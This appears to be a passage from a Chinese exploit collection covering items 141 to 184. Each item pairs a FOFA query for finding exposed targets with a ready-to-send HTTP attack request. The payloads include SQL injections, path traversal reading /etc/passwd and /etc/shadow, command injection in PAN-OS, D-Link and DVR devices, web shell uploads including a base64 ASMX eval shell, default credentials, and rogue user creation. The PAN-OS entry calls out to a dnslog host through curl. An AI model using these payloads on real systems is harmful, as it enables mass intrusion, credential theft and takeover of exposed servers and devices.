Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
